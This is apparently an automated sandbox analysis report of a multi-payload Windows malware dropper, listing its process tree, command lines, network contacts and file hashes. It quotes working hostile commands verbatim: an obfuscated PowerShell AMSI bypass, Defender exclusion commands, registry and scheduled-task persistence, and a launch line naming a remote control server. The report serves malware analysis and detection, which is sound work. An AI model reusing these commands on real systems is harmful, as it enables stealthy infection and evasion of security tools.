PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4432 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\System32\cmd.exe
PID 4432 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe C:\Windows\System32\cmd.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\Windows\SysWOW64\cmd.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 212 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe C:\ProgramData\$77images.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe
PID 4260 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe

"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WOtmSWFShvRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pfjvFlSDBXsxDi,[Parameter(Position=1)][Type]$CjhdyUjELm)$udbfxqizmVH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+'e'+'ct'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+'yp'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+',A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$udbfxqizmVH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+'By'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pfjvFlSDBXsxDi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+'a'+'n'+''+[Char](97)+'ged');$udbfxqizmVH.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'al',$CjhdyUjELm,$pfjvFlSDBXsxDi).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $udbfxqizmVH.CreateType();}$OoNMDpxBWibyq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+''+'O'+''+'o'+''+[Char](78)+''+'M'+''+[Char](68)+''+'p'+''+'x'+''+'B'+'W'+[Char](105)+''+[Char](98)+''+[Char](121)+''+[Char](113)+'');$pSxMtMXrgQCnhN=$OoNMDpxBWibyq.GetMethod('p'+[Char](83)+''+[Char](120)+''+'M'+''+[Char](116)+''+'M'+''+[Char](88)+''+'r'+'g'+'Q'+''+[Char](67)+''+[Char](110)+''+'h'+''+'N'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hwiWSEMWABBejCSBBAf=WOtmSWFShvRL @([String])([IntPtr]);$tebFqUkDLOwRrMToAKFvzU=WOtmSWFShvRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JlaihCxEFiI=$OoNMDpxBWibyq.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HkssHkJtViOVNJ=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$yEmWqtIjIKAKqAVit=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$raNrStu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HkssHkJtViOVNJ,$hwiWSEMWABBejCSBBAf).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$kijCdUeoZuAnJNFXn=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$raNrStu,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$bLvdKwpgzr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,4,[ref]$bLvdKwpgzr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$kijCdUeoZuAnJNFXn,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,0x20,[ref]$bLvdKwpgzr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AyQtOnZxLTaz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LCnzyOUSddtaFk,[Parameter(Position=1)][Type]$UakHJczsjl)$qfggMrAoIXv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+'m'+''+[Char](111)+'ry'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+'Se'+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$qfggMrAoIXv.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LCnzyOUSddtaFk).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$qfggMrAoIXv.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'ewSl'+'o'+''+'t'+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'ua'+[Char](108)+'',$UakHJczsjl,$LCnzyOUSddtaFk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $qfggMrAoIXv.CreateType();}$rYVFnUAlTrsWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](114)+''+[Char](89)+'V'+[Char](70)+''+'n'+''+'U'+''+[Char](65)+''+'l'+''+[Char](84)+''+[Char](114)+''+'s'+'Wl');$uBiOvSuBbnJfpW=$rYVFnUAlTrsWl.GetMethod(''+'u'+''+[Char](66)+''+[Char](105)+''+'O'+''+[Char](118)+''+'S'+'u'+[Char](66)+''+'b'+''+[Char](110)+''+[Char](74)+''+'f'+'p'+[Char](87)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BbpOVFUxnorBTkxGvjC=AyQtOnZxLTaz @([String])([IntPtr]);$oZxccsDUJBpjlLKxNJSXyh=AyQtOnZxLTaz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ITjqlmzkwBc=$rYVFnUAlTrsWl.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$wVpgrxmdXxYtdd=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$AtYTgCLZlVLfKbWiR=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+'t'+'e'+'c'+''+'t'+'')));$ntoRZJq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wVpgrxmdXxYtdd,$BbpOVFUxnorBTkxGvjC).Invoke(''+'a'+'m'+[Char](115)+''+'i'+'.'+[Char](100)+'l'+[Char](108)+'');$hvRSorvhVPjOjqRcZ=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ntoRZJq,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$HePbTHHcGC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,4,[ref]$HePbTHHcGC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hvRSorvhVPjOjqRcZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,0x20,[ref]$HePbTHHcGC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline"

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\ProgramData\$77images.exe

"C:\ProgramData\$77images.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f6ecc4b9-3dd8-44cd-92c1-e74b525bf90c}

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 131.253.33.200:443 www.bing.com tcp
N/A 52.182.141.63:443 tcp
N/A 2.18.109.224:443 tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 8.8.8.8:53 cabalfenix.ddns.net udp
N/A 93.184.221.240:80 tcp

Files

memory/5036-132-0x00000000001B0000-0x0000000000A8C000-memory.dmp

memory/5036-133-0x00000000057F0000-0x0000000005D94000-memory.dmp

memory/808-135-0x0000000000000000-mapping.dmp

memory/4924-137-0x00000000051E0000-0x0000000005216000-memory.dmp

memory/3536-136-0x0000000000000000-mapping.dmp

memory/4924-134-0x0000000000000000-mapping.dmp

memory/4924-138-0x0000000005930000-0x0000000005F58000-memory.dmp

memory/4924-139-0x0000000005850000-0x0000000005872000-memory.dmp

memory/4924-140-0x00000000060D0000-0x0000000006136000-memory.dmp

memory/4924-141-0x00000000061B0000-0x0000000006216000-memory.dmp

memory/2416-142-0x0000000000000000-mapping.dmp

memory/2416-143-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/2416-145-0x0000000000400000-0x0000000000CD5000-memory.dmp

memory/4924-146-0x00000000066A0000-0x00000000066BE000-memory.dmp

memory/3860-147-0x0000000000000000-mapping.dmp

memory/3748-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77Install.exe

MD5 2656bb680bc4b4a95ce5cb1443b2850d
SHA1 3033d5adc32e3df44205408dd3689670756e55a4
SHA256 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c
SHA512 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76

memory/2908-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe

MD5 f8169767c726f1be7a7e14839cc44d36
SHA1 571bcdb58a2017d77593ea1325bac737160b81f4
SHA256 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377
SHA512 c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

memory/212-153-0x0000000000000000-mapping.dmp

memory/3772-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe

MD5 48092158c6601dba353421f70d501025
SHA1 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2
SHA256 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405
SHA512 b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe

MD5 ca607a7fb0fa99f0ef20300deea83d55
SHA1 f6348167625781bb441dfcbb49f8e65c62144adf
SHA256 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36
SHA512 ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

memory/4432-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

memory/4432-163-0x0000000000FB0000-0x0000000001032000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe

MD5 eb51a99599683b7b3d47981722da5218
SHA1 e693b669e2c309869ce31f13661ba6eb3d3b0566
SHA256 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38
SHA512 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

